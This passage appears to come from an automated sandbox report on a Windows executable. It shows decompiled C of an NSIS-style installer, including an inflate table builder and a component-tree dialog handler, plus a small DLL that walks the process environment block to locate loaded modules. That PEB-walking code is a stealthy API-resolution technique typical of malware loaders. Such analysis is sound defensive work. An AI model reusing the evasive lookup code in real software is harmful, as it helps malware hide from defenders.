                                                                                                                          				signed int _t225;
                                                                                                                          				signed int* _t232;
                                                                                                                          				signed int _t233;
                                                                                                                          				signed int _t234;
                                                                                                                          				void* _t235;
                                                                                                                          				signed int _t236;
                                                                                                                          				signed int _t244;
                                                                                                                          				signed int _t246;
                                                                                                                          				signed int _t251;
                                                                                                                          				signed int _t254;
                                                                                                                          				signed int _t256;
                                                                                                                          				signed int _t259;
                                                                                                                          				signed int _t262;
                                                                                                                          				void* _t263;
                                                                                                                          				void* _t264;
                                                                                                                          				signed int _t267;
                                                                                                                          				intOrPtr _t269;
                                                                                                                          				intOrPtr _t271;
                                                                                                                          				signed int _t274;
                                                                                                                          				intOrPtr* _t275;
                                                                                                                          				unsigned int _t276;
                                                                                                                          				void* _t277;
                                                                                                                          				signed int _t278;
                                                                                                                          				intOrPtr* _t279;
                                                                                                                          				signed int _t281;
                                                                                                                          				intOrPtr _t282;
                                                                                                                          				intOrPtr _t283;
                                                                                                                          				signed int* _t284;
                                                                                                                          				signed int _t286;
                                                                                                                          				signed int _t287;
                                                                                                                          				signed int _t288;
                                                                                                                          				signed int _t296;
                                                                                                                          				signed int* _t297;
                                                                                                                          				intOrPtr _t298;
                                                                                                                          				void* _t299;
                                                                                                                          
                                                                                                                          				_t278 = _a8;
                                                                                                                          				_t187 = 0x10;
                                                                                                                          				memset( &_v116, 0, _t187 << 2);
                                                                                                                          				_t189 = _a4;
                                                                                                                          				_t233 = _t278;
                                                                                                                          				do {
                                                                                                                          					_t166 =  *_t189;
                                                                                                                          					_t189 =  &(_t189[1]);
                                                                                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                          					_t233 = _t233 - 1;
                                                                                                                          				} while (_t233 != 0);
                                                                                                                          				if(_v116 != _t278) {
                                                                                                                          					_t279 = _a28;
                                                                                                                          					_t267 =  *_t279;
                                                                                                                          					_t190 = 1;
                                                                                                                          					_a28 = _t267;
                                                                                                                          					_t234 = 0xf;
                                                                                                                          					while(1) {
                                                                                                                          						_t168 = 0;
                                                                                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						_t190 = _t190 + 1;
                                                                                                                          						if(_t190 <= _t234) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_v8 = _t190;
                                                                                                                          					if(_t267 < _t190) {
                                                                                                                          						_a28 = _t190;
                                                                                                                          					}
                                                                                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                          						_t234 = _t234 - 1;
                                                                                                                          						if(_t234 != 0) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_v28 = _t234;
                                                                                                                          					if(_a28 > _t234) {
                                                                                                                          						_a28 = _t234;
                                                                                                                          					}
                                                                                                                          					 *_t279 = _a28;
                                                                                                                          					_t181 = 1 << _t190;
                                                                                                                          					while(_t190 < _t234) {
                                                                                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                          						if(_t182 < 0) {
                                                                                                                          							L64:
                                                                                                                          							return _t168 | 0xffffffff;
                                                                                                                          						}
                                                                                                                          						_t190 = _t190 + 1;
                                                                                                                          						_t181 = _t182 + _t182;
                                                                                                                          					}
                                                                                                                          					_t281 = _t234 << 2;
                                                                                                                          					_t191 = _t299 + _t281 - 0x70;
                                                                                                                          					_t269 =  *_t191;
                                                                                                                          					_t183 = _t181 - _t269;
                                                                                                                          					_v52 = _t183;
                                                                                                                          					if(_t183 < 0) {
                                                                                                                          						goto L64;
                                                                                                                          					}
                                                                                                                          					_v176 = _t168;
                                                                                                                          					 *_t191 = _t269 + _t183;
                                                                                                                          					_t192 = 0;
                                                                                                                          					_t235 = _t234 - 1;
                                                                                                                          					if(_t235 == 0) {
                                                                                                                          						L21:
                                                                                                                          						_t184 = _a4;
                                                                                                                          						_t271 = 0;
                                                                                                                          						do {
                                                                                                                          							_t193 =  *_t184;
                                                                                                                          							_t184 =  &(_t184[1]);
                                                                                                                          							if(_t193 != _t168) {
                                                                                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                          								_t236 =  *_t232;
                                                                                                                          								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
                                                                                                                          								 *_t232 = _t236 + 1;
                                                                                                                          							}
                                                                                                                          							_t271 = _t271 + 1;
                                                                                                                          						} while (_t271 < _a8);
                                                                                                                          						_v16 = _v16 | 0xffffffff;
                                                                                                                          						_v40 = _v40 & 0x00000000;
                                                                                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                          						_t195 = _v8;
                                                                                                                          						_t186 =  ~_a28;
                                                                                                                          						_v12 = _t168;
                                                                                                                          						_v180 = _t168;
                                                                                                                          						_v36 = 0x42d6d0;
                                                                                                                          						_v240 = _t168;
                                                                                                                          						if(_t195 > _v28) {
                                                                                                                          							L62:
                                                                                                                          							_t168 = 0;
                                                                                                                          							if(_v52 == 0 || _v28 == 1) {
                                                                                                                          								return _t168;
                                                                                                                          							} else {
                                                                                                                          								goto L64;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v44 = _t195 - 1;
                                                                                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                          						do {
                                                                                                                          							_t282 =  *_v32;
                                                                                                                          							if(_t282 == 0) {
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          							while(1) {
                                                                                                                          								_t283 = _t282 - 1;
                                                                                                                          								_t200 = _a28 + _t186;
                                                                                                                          								_v48 = _t283;
                                                                                                                          								_v24 = _t200;
                                                                                                                          								if(_v8 <= _t200) {
                                                                                                                          									goto L45;
                                                                                                                          								}
                                                                                                                          								L31:
                                                                                                                          								_v20 = _t283 + 1;
                                                                                                                          								do {
                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                          									_t296 = _v28 - _v24;
                                                                                                                          									if(_t296 > _a28) {
                                                                                                                          										_t296 = _a28;
                                                                                                                          									}
                                                                                                                          									_t222 = _v8 - _v24;
                                                                                                                          									_t254 = 1 << _t222;
                                                                                                                          									if(1 <= _v20) {
                                                                                                                          										L40:
                                                                                                                          										_t256 =  *_a36;
                                                                                                                          										_t168 = 1 << _t222;
                                                                                                                          										_v40 = 1;
                                                                                                                          										_t274 = _t256 + 1;
                                                                                                                          										if(_t274 > 0x5a0) {
                                                                                                                          											goto L64;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t275 = _v32;
                                                                                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                          										if(_t222 >= _t296) {
                                                                                                                          											goto L40;
                                                                                                                          										}
                                                                                                                          										while(1) {
                                                                                                                          											_t222 = _t222 + 1;
                                                                                                                          											if(_t222 >= _t296) {
                                                                                                                          												goto L40;
                                                                                                                          											}
                                                                                                                          											_t275 = _t275 + 4;
                                                                                                                          											_t264 = _t263 + _t263;
                                                                                                                          											_t175 =  *_t275;
                                                                                                                          											if(_t264 <= _t175) {
                                                                                                                          												goto L40;
                                                                                                                          											}
                                                                                                                          											_t263 = _t264 - _t175;
                                                                                                                          										}
                                                                                                                          										goto L40;
                                                                                                                          									}
                                                                                                                          									_t168 = _a32 + _t256 * 4;
                                                                                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                          									 *_a36 = _t274;
                                                                                                                          									_t259 = _v16;
                                                                                                                          									 *_t297 = _t168;
                                                                                                                          									if(_t259 == 0) {
                                                                                                                          										 *_a24 = _t168;
                                                                                                                          									} else {
                                                                                                                          										_t276 = _v12;
                                                                                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                          										_a5 = _a28;
                                                                                                                          										_a4 = _t222;
                                                                                                                          										_t262 = _t276 >> _t186;
                                                                                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                          									}
                                                                                                                          									_t224 = _v24;
                                                                                                                          									_t186 = _t224;
                                                                                                                          									_t225 = _t224 + _a28;
                                                                                                                          									_v24 = _t225;
                                                                                                                          								} while (_v8 > _t225);
                                                                                                                          								L45:
                                                                                                                          								_t284 = _v36;
                                                                                                                          								_a5 = _v8 - _t186;
                                                                                                                          								if(_t284 < 0x42d6d0 + _a8 * 4) {
                                                                                                                          									_t205 =  *_t284;
                                                                                                                          									if(_t205 >= _a12) {
                                                                                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                          										_v36 =  &(_v36[1]);
                                                                                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                          									} else {
                                                                                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                          										_t208 =  *_t284;
                                                                                                                          										_v36 =  &(_t284[1]);
                                                                                                                          									}
                                                                                                                          									_a6 = _t208;
                                                                                                                          								} else {
                                                                                                                          									_a4 = 0xc0;
                                                                                                                          								}
                                                                                                                          								_t286 = 1 << _v8 - _t186;
                                                                                                                          								_t244 = _v12 >> _t186;
                                                                                                                          								while(_t244 < _v40) {
                                                                                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                          									_t244 = _t244 + _t286;
                                                                                                                          								}
                                                                                                                          								_t287 = _v12;
                                                                                                                          								_t246 = 1 << _v44;
                                                                                                                          								while((_t287 & _t246) != 0) {
                                                                                                                          									_t287 = _t287 ^ _t246;
                                                                                                                          									_t246 = _t246 >> 1;
                                                                                                                          								}
                                                                                                                          								_t288 = _t287 ^ _t246;
                                                                                                                          								_v20 = 1;
                                                                                                                          								_v12 = _t288;
                                                                                                                          								_t251 = _v16;
                                                                                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                          									L60:
                                                                                                                          									if(_v48 != 0) {
                                                                                                                          										_t282 = _v48;
                                                                                                                          										_t283 = _t282 - 1;
                                                                                                                          										_t200 = _a28 + _t186;
                                                                                                                          										_v48 = _t283;
                                                                                                                          										_v24 = _t200;
                                                                                                                          										if(_v8 <= _t200) {
                                                                                                                          											goto L45;
                                                                                                                          										}
                                                                                                                          										goto L31;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								} else {
                                                                                                                          									goto L58;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L58:
                                                                                                                          									_t186 = _t186 - _a28;
                                                                                                                          									_t251 = _t251 - 1;
                                                                                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                          								_v16 = _t251;
                                                                                                                          								goto L60;
                                                                                                                          							}
                                                                                                                          							L61:
                                                                                                                          							_v8 = _v8 + 1;
                                                                                                                          							_v32 = _v32 + 4;
                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                          						} while (_v8 <= _v28);
                                                                                                                          						goto L62;
                                                                                                                          					}
                                                                                                                          					_t277 = 0;
                                                                                                                          					do {
                                                                                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                          						_t277 = _t277 + 4;
                                                                                                                          						_t235 = _t235 - 1;
                                                                                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                          					} while (_t235 != 0);
                                                                                                                          					goto L21;
                                                                                                                          				}
                                                                                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                          				return 0;
                                                                                                                          			}











































































                                                                                                                          0x004074eb
                                                                                                                          0x004074f3
                                                                                                                          0x004074f7
                                                                                                                          0x004074fd
                                                                                                                          0x004074c9
                                                                                                                          0x004074d7
                                                                                                                          0x004074da
                                                                                                                          0x004074e0
                                                                                                                          0x004074e0
                                                                                                                          0x00407501
                                                                                                                          0x004074bc
                                                                                                                          0x004074bc
                                                                                                                          0x004074bc
                                                                                                                          0x00407512
                                                                                                                          0x00407516
                                                                                                                          0x00407522
                                                                                                                          0x0040751d
                                                                                                                          0x00407520
                                                                                                                          0x00407520
                                                                                                                          0x0040752a
                                                                                                                          0x0040752f
                                                                                                                          0x00407537
                                                                                                                          0x00407533
                                                                                                                          0x00407535
                                                                                                                          0x00407535
                                                                                                                          0x0040753d
                                                                                                                          0x0040753f
                                                                                                                          0x00407546
                                                                                                                          0x00407550
                                                                                                                          0x0040755a
                                                                                                                          0x00407576
                                                                                                                          0x0040757a
                                                                                                                          0x004073bf
                                                                                                                          0x004073c5
                                                                                                                          0x004073c6
                                                                                                                          0x004073c8
                                                                                                                          0x004073ce
                                                                                                                          0x004073d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004073d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040755c
                                                                                                                          0x0040755c
                                                                                                                          0x0040755c
                                                                                                                          0x00407561
                                                                                                                          0x0040756a
                                                                                                                          0x00407573
                                                                                                                          0x00000000
                                                                                                                          0x00407573
                                                                                                                          0x00407580
                                                                                                                          0x00407580
                                                                                                                          0x00407583
                                                                                                                          0x0040758a
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x004073b0
                                                                                                                          0x00407330
                                                                                                                          0x00407332
                                                                                                                          0x00407332
                                                                                                                          0x00407336
                                                                                                                          0x00407339
                                                                                                                          0x0040733a
                                                                                                                          0x0040733a
                                                                                                                          0x00000000
                                                                                                                          0x00407332
                                                                                                                          0x004072a6
                                                                                                                          0x004072ac
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E703C47AD(void* __eflags, intOrPtr* _a4) {
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _t35;
                                                                                                                          
                                                                                                                          				_v16 =  *[fs:0x30];
                                                                                                                          				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                                                                                          				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                          				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                          				while(E703C46F1(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                                                                                          					_v8 =  *_v8;
                                                                                                                          					if(_v8 != _v20) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return  *((intOrPtr*)(_v8 + 0x28));
                                                                                                                          			}









                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E703C45AA() {
                                                                                                                          
                                                                                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                                                          			}




                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				struct HWND__* _v12;
                                                                                                                          				long _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				signed char* _v32;
                                                                                                                          				int _v36;
                                                                                                                          				signed int _v44;
                                                                                                                          				int _v48;
                                                                                                                          				signed int* _v60;
                                                                                                                          				signed char* _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				long _v72;
                                                                                                                          				void* _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				intOrPtr _v84;
                                                                                                                          				void* _v88;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t203;
                                                                                                                          				intOrPtr _t206;
                                                                                                                          				intOrPtr _t207;
                                                                                                                          				long _t212;
                                                                                                                          				signed int _t216;
                                                                                                                          				signed int _t227;
                                                                                                                          				void* _t230;
                                                                                                                          				void* _t231;
                                                                                                                          				int _t237;
                                                                                                                          				long _t242;
                                                                                                                          				long _t243;
                                                                                                                          				signed int _t244;
                                                                                                                          				signed int _t250;
                                                                                                                          				signed int _t252;
                                                                                                                          				signed char _t253;
                                                                                                                          				signed char _t259;
                                                                                                                          				void* _t264;
                                                                                                                          				void* _t266;
                                                                                                                          				signed char* _t284;
                                                                                                                          				signed char _t285;
                                                                                                                          				long _t290;
                                                                                                                          				signed int _t300;
                                                                                                                          				signed int _t308;
                                                                                                                          				signed char* _t316;
                                                                                                                          				int _t320;
                                                                                                                          				int _t321;
                                                                                                                          				signed int* _t322;
                                                                                                                          				int _t323;
                                                                                                                          				long _t324;
                                                                                                                          				signed int _t325;
                                                                                                                          				long _t327;
                                                                                                                          				int _t328;
                                                                                                                          				signed int _t329;
                                                                                                                          				void* _t331;
                                                                                                                          
                                                                                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                          				_v8 = GetDlgItem(_a4, 0x408);
                                                                                                                          				_t331 = SendMessageA;
                                                                                                                          				_v24 =  *0x42f488;
                                                                                                                          				_v28 =  *0x42f454 + 0x94;
                                                                                                                          				_t320 = 0x10;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L23:
                                                                                                                          					if(_a8 != 0x405) {
                                                                                                                          						_t298 = _a16;
                                                                                                                          					} else {
                                                                                                                          						_a12 = 0;
                                                                                                                          						_t298 = 1;
                                                                                                                          						_a8 = 0x40f;
                                                                                                                          						_a16 = 1;
                                                                                                                          					}
                                                                                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                          						_v16 = _t298;
                                                                                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                                                          							if(( *0x42f45d & 0x00000002) != 0) {
                                                                                                                          								L41:
                                                                                                                          								if(_v16 != 0) {
                                                                                                                          									_t242 = _v16;
                                                                                                                          									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                                                          										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                                                          									}
                                                                                                                          									_t243 = _v16;
                                                                                                                          									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                                                          										_t298 = _v24;
                                                                                                                          										_t244 =  *(_t243 + 0x5c);
                                                                                                                          										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                                                          										} else {
                                                                                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L48;
                                                                                                                          							}
                                                                                                                          							if(_a8 == 0x413) {
                                                                                                                          								L33:
                                                                                                                          								_t298 = 0 | _a8 != 0x00000413;
                                                                                                                          								_t250 = E00404C24(_v8, _a8 != 0x413);
                                                                                                                          								_t325 = _t250;
                                                                                                                          								if(_t325 >= 0) {
                                                                                                                          									_t99 = _v24 + 8; // 0x8
                                                                                                                          									_t298 = _t250 * 0x418 + _t99;
                                                                                                                          									_t252 =  *_t298;
                                                                                                                          									if((_t252 & 0x00000010) == 0) {
                                                                                                                          										if((_t252 & 0x00000040) == 0) {
                                                                                                                          											_t253 = _t252 ^ 0x00000001;
                                                                                                                          										} else {
                                                                                                                          											_t259 = _t252 ^ 0x00000080;
                                                                                                                          											if(_t259 >= 0) {
                                                                                                                          												_t253 = _t259 & 0x000000fe;
                                                                                                                          											} else {
                                                                                                                          												_t253 = _t259 | 0x00000001;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										 *_t298 = _t253;
                                                                                                                          										E0040117D(_t325);
                                                                                                                          										_a12 = _t325 + 1;
                                                                                                                          										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
                                                                                                                          										_a8 = 0x40f;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							_t298 = _a16;
                                                                                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							goto L33;
                                                                                                                          						} else {
                                                                                                                          							goto L48;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						L48:
                                                                                                                          						if(_a8 != 0x111) {
                                                                                                                          							L56:
                                                                                                                          							if(_a8 == 0x200) {
                                                                                                                          								SendMessageA(_v8, 0x200, 0, 0);
                                                                                                                          							}
                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                          								_t230 =  *0x42a89c;
                                                                                                                          								if(_t230 != 0) {
                                                                                                                          									ImageList_Destroy(_t230);
                                                                                                                          								}
                                                                                                                          								_t231 =  *0x42a8b0;
                                                                                                                          								if(_t231 != 0) {
                                                                                                                          									GlobalFree(_t231);
                                                                                                                          								}
                                                                                                                          								 *0x42a89c = 0;
                                                                                                                          								 *0x42a8b0 = 0;
                                                                                                                          								 *0x42f4c0 = 0;
                                                                                                                          							}
                                                                                                                          							if(_a8 != 0x40f) {
                                                                                                                          								L90:
                                                                                                                          								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
                                                                                                                          									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                          									ShowWindow(_v8, _t321);
                                                                                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                                                          								}
                                                                                                                          								goto L93;
                                                                                                                          							} else {
                                                                                                                          								E004011EF(_t298, 0, 0);
                                                                                                                          								_t203 = _a12;
                                                                                                                          								if(_t203 != 0) {
                                                                                                                          									if(_t203 != 0xffffffff) {
                                                                                                                          										_t203 = _t203 - 1;
                                                                                                                          									}
                                                                                                                          									_push(_t203);
                                                                                                                          									_push(8);
                                                                                                                          									E00404CA4();
                                                                                                                          								}
                                                                                                                          								if(_a16 == 0) {
                                                                                                                          									L75:
                                                                                                                          									E004011EF(_t298, 0, 0);
                                                                                                                          									_v36 =  *0x42a8b0;
                                                                                                                          									_t206 =  *0x42f488;
                                                                                                                          									_v64 = 0xf030;
                                                                                                                          									_v24 = 0;
                                                                                                                          									if( *0x42f48c <= 0) {
                                                                                                                          										L86:
                                                                                                                          										if( *0x42f44c == 4) {
                                                                                                                          											InvalidateRect(_v8, 0, 1);
                                                                                                                          										}
                                                                                                                          										_t207 =  *0x42ec1c; // 0x82c3c2
                                                                                                                          										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                                                          											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
                                                                                                                          										}
                                                                                                                          										goto L90;
                                                                                                                          									}
                                                                                                                          									_t322 = _t206 + 8;
                                                                                                                          									do {
                                                                                                                          										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                          										if(_t212 != 0) {
                                                                                                                          											_t300 =  *_t322;
                                                                                                                          											_v72 = _t212;
                                                                                                                          											_v76 = 8;
                                                                                                                          											if((_t300 & 0x00000001) != 0) {
                                                                                                                          												_v76 = 9;
                                                                                                                          												_v60 =  &(_t322[4]);
                                                                                                                          												_t322[0] = _t322[0] & 0x000000fe;
                                                                                                                          											}
                                                                                                                          											if((_t300 & 0x00000040) == 0) {
                                                                                                                          												_t216 = (_t300 & 0x00000001) + 1;
                                                                                                                          												if((_t300 & 0x00000010) != 0) {
                                                                                                                          													_t216 = _t216 + 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t216 = 3;
                                                                                                                          											}
                                                                                                                          											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                                                          											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                          											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                                                          										}
                                                                                                                          										_v24 = _v24 + 1;
                                                                                                                          										_t322 =  &(_t322[0x106]);
                                                                                                                          									} while (_v24 <  *0x42f48c);
                                                                                                                          									goto L86;
                                                                                                                          								} else {
                                                                                                                          									_t323 = E004012E2( *0x42a8b0);
                                                                                                                          									E00401299(_t323);
                                                                                                                          									_t227 = 0;
                                                                                                                          									_t298 = 0;
                                                                                                                          									if(_t323 <= 0) {
                                                                                                                          										L74:
                                                                                                                          										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                                                          										_a16 = _t323;
                                                                                                                          										_a8 = 0x420;
                                                                                                                          										goto L75;
                                                                                                                          									} else {
                                                                                                                          										goto L71;
                                                                                                                          									}
                                                                                                                          									do {
                                                                                                                          										L71:
                                                                                                                          										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                                                          											_t298 = _t298 + 1;
                                                                                                                          										}
                                                                                                                          										_t227 = _t227 + 1;
                                                                                                                          									} while (_t227 < _t323);
                                                                                                                          									goto L74;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                          							goto L93;
                                                                                                                          						} else {
                                                                                                                          							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                                                          							if(_t237 == 0xffffffff) {
                                                                                                                          								goto L93;
                                                                                                                          							}
                                                                                                                          							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                                                          							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                                                          								_t324 = 0x20;
                                                                                                                          							}
                                                                                                                          							E00401299(_t324);
                                                                                                                          							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                                                          							_a12 = _a12 | 0xffffffff;
                                                                                                                          							_a16 = 0;
                                                                                                                          							_a8 = 0x40f;
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_v36 = 0;
                                                                                                                          					 *0x42f4c0 = _a4;
                                                                                                                          					_v20 = 2;
                                                                                                                          					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
                                                                                                                          					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
                                                                                                                          					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
                                                                                                                          					_v16 = _t264;
                                                                                                                          					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
                                                                                                                          					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                                                          					 *0x42a89c = _t266;
                                                                                                                          					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                                                          					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
                                                                                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                                                          						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                                                          					}
                                                                                                                          					DeleteObject(_v16);
                                                                                                                          					_t327 = 0;
                                                                                                                          					do {
                                                                                                                          						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                                                          						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
